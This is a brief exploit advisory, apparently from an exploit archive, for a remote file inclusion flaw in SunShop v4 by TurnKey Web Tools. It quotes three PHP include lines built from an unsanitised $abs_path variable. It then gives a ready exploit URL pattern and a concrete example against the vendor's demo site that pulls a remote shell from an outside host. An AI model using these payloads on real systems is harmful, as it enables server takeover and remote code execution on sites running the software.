sunshop v4 >> RFI

vendor : turnkeywebtools.com
by : s3rv3r_hack3r ( [email protected] )
bugz:
++++++++++++++++++++
include/payment/payflow_pro.php >
include $abs_path."/include/payment/payflow_pro/pfpro.class.php";
++++++++++++++++++++
global.php
require_once $abs_path."/libsecure.php";
++++++++++++++++++++
libsecure.php
include $abs_path . '/admin/config.php';
++++++++++++++++++++
EXploit : file.php?abs_path=http://shell
for example :
http://demos.turnkeywebtools.com/ss4/include/payment/payflow_pro.php?abs_path=http://www.hackerz.ir/?